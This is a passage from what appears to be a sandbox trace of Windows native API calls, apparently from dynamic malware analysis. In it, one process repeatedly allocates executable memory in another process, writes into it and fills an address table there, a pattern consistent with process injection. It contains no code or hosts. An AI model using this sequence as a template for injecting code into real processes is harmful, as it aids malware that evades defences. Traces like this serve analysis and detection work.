[0140.423] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.423] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.424] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.424] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.424] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.424] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.424] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20027, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.424] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.424] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0d8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.424] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2a, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.424] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94a010*, NumberOfBytesToWrite=0x12, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94a010*, NumberOfBytesWritten=0x28df88*=0x12) returned 0x0 [0140.425] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.425] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.425] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.425] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.425] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.425] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.425] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.425] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.425] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.426] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.426] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20022, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.426] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.426] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0e0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.426] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x34, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.426] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949c14*, NumberOfBytesToWrite=0x1c, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949c14*, NumberOfBytesWritten=0x28df88*=0x1c) returned 0x0 [0140.426] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.426] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.427] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.427] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.427] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.427] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.427] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.427] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.427] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.427] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.428] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2002c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.428] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.428] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0e8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.428] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.428] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949c02*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949c02*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0140.428] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.428] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.428] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.428] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.429] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.429] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.429] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.429] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.429] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.429] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.429] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.429] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.429] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0f0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.430] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.430] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949abc*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949abc*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0140.430] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.430] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.430] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.430] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.430] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.430] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.431] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.431] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.431] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.431] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.431] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.431] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.431] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0f8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.431] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.432] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949aca*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949aca*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0140.432] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.432] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.432] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.432] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.432] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.432] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.432] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.433] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.433] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.433] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.433] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.433] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.433] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a100, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.433] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.434] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949ad6*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949ad6*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0140.434] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.434] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.434] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.434] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.434] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.434] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.434] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.435] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.435] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.435] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.435] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.435] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.435] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a108, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.435] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.435] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949ae4*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949ae4*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0140.435] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.436] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.436] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.436] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.436] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.436] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.436] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.437] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.437] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.437] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.437] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.437] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.437] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a110, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.437] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.437] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949afa*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949afa*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.438] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.438] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.438] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.438] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, 